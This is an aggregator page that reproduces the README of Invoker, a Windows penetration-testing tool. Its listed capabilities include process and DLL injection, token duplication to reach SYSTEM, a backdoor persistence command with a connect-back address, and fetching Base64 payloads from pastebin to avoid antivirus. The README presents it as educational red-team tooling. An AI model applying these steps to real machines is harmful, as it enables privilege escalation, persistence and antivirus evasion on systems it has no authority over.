All Projects → ivan-sincek → Invoker

ivan-sincek / Invoker

Licence: mit
Penetration testing utility, and antivirus assessment tool.

Programming Languages

powershell
5483 projects
bytecode
52 projects

Projects that are alternatives of or similar to Invoker

ProcessInjector.NET
Learning Process Injection and Hollowing techniques
Stars: ✭ 23 (-87.08%)
Mutual labels:  dll, injection, process
FA2sp
C&C Red Alert 2: Yuri's Revenge Map Editor : Final Alert 2 extension
Stars: ✭ 28 (-84.27%)
Mutual labels:  dll, injection
moneta
Moneta is a live usermode memory analysis tool for Windows with the capability to detect malware IOCs
Stars: ✭ 384 (+115.73%)
Mutual labels:  injection, process
DLL-Injector
Inject and detour DLLs and program functions both managed and unmanaged in other programs, written (almost) purely in C#. [Not maintained].
Stars: ✭ 29 (-83.71%)
Mutual labels:  dll, process
Kernel-dll-injector
Kernel-Mode Driver that loads a dll into every new created process that loads kernel32.dll module
Stars: ✭ 256 (+43.82%)
Mutual labels:  dll, injection
Reflexil
The .NET Assembly Editor
Stars: ✭ 1,117 (+527.53%)
Mutual labels:  dll, injection
UniversalUnityHooks
A framework designed to hook into and modify methods in unity games via dlls
Stars: ✭ 78 (-56.18%)
Mutual labels:  dll, injection
Sharpneedle
Inject C# code into a running process
Stars: ✭ 301 (+69.1%)
Mutual labels:  dll, injection
Pcsgolh
PCSGOLH - Pointless Counter-Strike: Global Offensive Lua Hooks. A open-source Lua API for CS:GO hacking written in modern C++
Stars: ✭ 56 (-68.54%)
Mutual labels:  dll, injection
Process Inject
在Windows环境下的进程注入方法:远程线程注入、创建进程挂起注入、反射注入、APCInject、SetWindowHookEX注入
Stars: ✭ 395 (+121.91%)
Mutual labels:  dll, injection
Injectcollection
A collection of injection via vc++ in ring3
Stars: ✭ 131 (-26.4%)
Mutual labels:  dll, injection
Vac Hooks
Hook WinAPI functions used by Valve Anti-Cheat. Log calls and intercept arguments & return values. DLL written in C.
Stars: ✭ 103 (-42.13%)
Mutual labels:  dll, injection
Mandibule
linux elf injector for x86 x86_64 arm arm64
Stars: ✭ 171 (-3.93%)
Mutual labels:  process, injection
Gitdir
Download a single directory/folder from a GitHub repo
Stars: ✭ 163 (-8.43%)
Mutual labels:  downloader
Imagetosticker
Whatsapp Bot - sticker creator
Stars: ✭ 170 (-4.49%)
Mutual labels:  downloader
Horion
Horion - A Minecraft: Bedrock Edition Utility Mod.
Stars: ✭ 163 (-8.43%)
Mutual labels:  dll
Invoke Apex
A PowerShell-based toolkit and framework consisting of a collection of techniques and tradecraft for use in red team, post-exploitation, adversary simulation, or other offensive security tasks.
Stars: ✭ 162 (-8.99%)
Mutual labels:  offensive-security
Awae Preparation
This repository will contain all trainings and tutorials I have done/read to prepare for OSWE / AWAE.
Stars: ✭ 173 (-2.81%)
Mutual labels:  offensive-security
Mctrl
C library providing set of additional user interface controls for Windows, intended to be complementary to standard Win32API controls from USER32.DLL and COMCTL32.DLL.
Stars: ✭ 169 (-5.06%)
Mutual labels:  dll
Macos Downloader
Command line tool for downloading macOS installers and beta updates
Stars: ✭ 162 (-8.99%)
Mutual labels:  downloader

Invoker

Penetration testing utility, and antivirus assessment tool.

The main goal is to use this tool when access to some Windows OS features through GUI is restricted.

Built with Dev-C++ IDE v5.11 (64-bit), compiled with TDM-GCC v4.9.2 (32-bit and 64-bit) and tested on Windows 10 Enterprise OS (64-bit). Download Dev-C++ from here.

NEW: Visual Studio Community 2019 v16.7.6 projects added.

Dev-C++ project with C++03 standard is somehow stealthier than Visual Studio project with C++11 standard.

Made for educational purposes. I hope it will help!

Future plans:

  • Direct System Calls,
  • DLL Proxying,
  • COM Hijacking.

Table of Contents

Invoker Library

Capabilities:

  • invoke the Command Prompt and PowerShell,
  • download a file,
  • add a registry key,
  • schedule a task,
  • Windows Management Instrumentation (WMI),
  • connect to a remote host,
  • terminate a running process,
  • run a new process,
  • dump a process memory,
  • inject a bytecode into a running process,
  • inject a DLL into a running process,
  • list DLLs of a running process,
  • install a hook procedure,
  • enable access token privileges,
  • duplicate the access token of a running process,
  • list unquoted service paths and restart a running service,
  • replace Sticky Keys.

Some features may require administrative privileges.

Check the library here. Feel free to use it!

How to Run

Run \exec\Invoker_x86.exe (32-bit) or \exec\Invoker_x64.exe (64-bit).

To automate the backdoor while setting up a persistence, run the following command:

Invoker_x64.exe 192.168.8.5 9000

32-bit Invoker can only:

  • dump the memory of a 32-bit process,
  • inject a 32-bit bytecode into a 32-bit process,
  • inject a 32-bit DLL into a 32-bit process,
  • list DLLs of a 32-bit process,
  • install a hook procedure from a 32-bit DLL.

64-bit Invoker can only:

  • dump the memory of a 32-bit process,
  • dump the memory of a 64-bit process,
  • inject a 32-bit bytecode into a 32-bit process,
  • inject a 64-bit bytecode into a 64-bit process,
  • inject a 32-bit DLL into a 32-bit process,
  • inject a 64-bit DLL into a 64-bit process,
  • list DLLs of a 32-bit process,
  • list DLLs of a 64-bit process.
  • install a hook procedure from a 32-bit DLL,
  • install a hook procedure from a 64-bit DLL.

Bytecode Injection

Elevate privileges by injecting bytecode into a higher-privileged process.

This tool can parse an HTTP response and extract the payload from a custom element, e.g. from <invoker>payload</invoker> where payload is a binary code/file encoded in Base64.

Check the example at pastebin.com/raw/xf9Trt0d.

This might be useful if antivirus is constantly deleting your local payloads.

Also, check an additional example at pastebin.com/raw/iW17rCxH.

P.S. Bytecode provided will most certainly not work for you.

Use ngrok to give your local web server a public address.

Too see if a process is 32-bit or 64-bit open up Task Manager -> click on More details -> go to Details tab -> right click on any of the columns -> click on Select columns -> check the Platform checkbox.

Additionally, to see if a process is running with administrative privileges check the Elevated checkbox.

Generate a Reverse Shell Payload

Find out how to generate a reverse shell payload from my other project, as well as, find out how to set up an Ncat and multi/handler listeners.

PowerShell Scripts

Check all the PowerShell scripts used in the main C++ program here.

Make a DLL With a Hook Procedure

Find out how to make a DLL with a hook procedure here. The hook procedure will invoke a message box on each window close.

Also, check out a keyboard hook procedure here.

Make sure to remove all the created artifacts after you are done testing, e.g. remove keylogger.log.

Get the LocalSystem Account (NT AUTHORITY\SYSTEM)

Run the Invoker as administrator.

Enable all access token privileges.

Duplicate the access token from e.g. Windows Logon Application (winlogon.exe) and run a new instance of the Invoker.

Within the new Invoker instance, open the Command Prompt and run whoami, you should now see nt authority\system.

Enable all access token privileges once again.

Close the old Invoker instance.

P.S. You get more access token privileges from Local Security Authority Subsystem Service (lsass.exe).

Images

Invoker

Figure 1 - Invoker

Add/Edit Registry Key

Figure 2 - Add/Edit Registry Key

Bytecode Injection

Figure 3 - Bytecode Injection

Elevated Privileges

Figure 4 - Elevated Privileges

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].